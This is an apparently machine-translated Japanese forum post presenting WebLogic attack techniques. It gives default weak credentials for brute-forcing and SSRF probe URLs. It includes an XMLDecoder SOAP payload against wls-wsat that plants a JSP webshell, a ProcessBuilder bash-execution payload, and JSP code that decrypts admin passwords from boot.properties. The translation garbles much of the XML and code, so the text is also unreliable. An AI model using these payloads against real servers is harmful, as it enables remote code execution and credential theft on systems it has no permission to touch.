Jump to content

1。管理者ログインページ弱いパスワード

ウェブロジックのポートは一般に7001であり、弱いパスワードは一般的にweblogic/oracle@123orweblogicであるか、特定の状況、会社名、人名などに基づいて推測し、ブルートフォースの亀裂にバープセイトの侵入者を使用できます。成功したら、War Package GetShellをアップロードできます。

hqiiw2liuyk9041.png

2。 WebLogic SSRF

Oracle WebLogic Webサーバーには、外部ホストがアクセスでき、内部ホストへのアクセスも可能になります。このURLが存在する場合

http://192.168.8.128:7001/uddiexplorer/searchPublicRegistries.jspにはSSRFがあります。 192.168.1.59:139のポート139(オープン)とポート138(開いていない)の復帰とポートオープニングステータスを聞いてみましょう。

http://192.168.8.128:7001/uddiexplorer/searchpublicregistries.jsp?operator=3http://192.168.1.59:139rdosearch=nametxtsearchname=sself busing=seart business+

vdujg5aa0nq9042.png

http://192.168.8.128:7001/uddiexplorer/searchpublicregistries.jsp?operator=3http://192.168.1.59:138rdosearch=nametxtsearchname=severbtseartfor

kzz4bvu2bkk9043.png

3。 weblogic deserialization

Wenlogic Deserializationの脆弱性は長い間暴露されてきました。インターネット上でさまざまなツールを見つけることができるので、ここでは言及しません。

2hry25kakzi9044.png

vxq1revt5qw9045.png

4。 weblogic_uac

ステップ1:クロールhttp://x.x.x.x.x.x.x33607001/wls-wsat/coordinatorporttype postリクエストを開始する(URLペアがOKである限り、任意のパッケージは大丈夫です)

susidajbh4u9046.png

ステップ2 Content-Type:Text/XMLの追加ステップ3ボディにペイロードを置く

soapenv3360envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/'

soapenv3360header

work:workcontext xmlns:work='http://bea.com/2004/06/soap/workarea/'

Javajavaバージョン='1.4.0' class='java.beans.xmldecoder'

オブジェクトクラス='java.io.printwriter'

Stringservers/adminserver/tmp/_wl_internal/bea_wls_internal/9j4dqk/a.jsp/stringvoid method='println'

string![cdata [`ここに馬を設定します(馬のコードが長すぎるので、ここにアップロードされたps:を表示しないでください。中国語を含めないでください。エラーを報告しない場合は、中国人を削除してアップロードできます。

]]/string/voidvoid method='close'/

/物体

/java

/java

/work:workcontext

/soapenv3360header

soapenv:body/

/soapenv3360envelope

lgm4vhogxzn9047.png

lgh4l3h5wz59048.png

上記はデフォルトのパスです。デフォルトのパスではなく、Linuxシステムでもある場合、次のペイロード爆発パスを使用できます。

soapenv3360envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/'

soapenv3360header

work:workcontext xmlns:work='http://bea.com/2004/06/soap/workarea/'

Javaバージョン='1.8.0_131' class='java.beans.xmldecoder'

void class='java.lang.processbuilder'

array class='java.lang.string' length='3'

void index='0'

文字列/bin/bash/string

/空所

void index='1'

文字列-C/文字列

/空所

void index='2'

stringfind $ domain_home -type d -name bea_wls_internal |読み取りf;

/空所

/配列

void method='start' //void

/java

/work:workcontext

/soapenv3360header

soapenv:body/

/soapenv3360envelope

5。 weblogic online and offline decryption

ウェブシェルがある場合は、オンラインで復号化できます

アクセスのために次のコードをサーバーに入れ、s=''のウェブロジック暗号化パスワードを入力すると、boot.propertiesファイルで見つけることができます。デフォルトのパスは./././server/security/boot.propertiesです

0w0svp4ptgv9049.png

%@page pageencoding='utf-8'%

%@ページインポート='weblogic.security.internal。*、weblogic.security.internal.encryption。*'%

encryptionservice es=null;

ClearorEcryptedService CES=null;

文字列s=null;

s='{aes} wffnch6k+9nz22r1gcmnylgur9ho5kz8ndgib/tuozu=';

es=serializedsystemini.getEncryptionservice();

if(es==null){

out.println( '暗号化サービスを初期化できません');

戻る;

}

ces=new clearorEncryptedService(es);

if(s!=null){

out.println( '\ ndecryptedパスワードis:' + ces.decrypt(s));

}

オフラインの復号化には、2つのファイルSerializedsystemini.datとboot.propertiesが必要です

tdv5zbux2on9050.png

出典:https://xz.aliyun.com/t/2149

0 Comments

Recommended Comments

There are no comments to display.

Guest
Add a comment...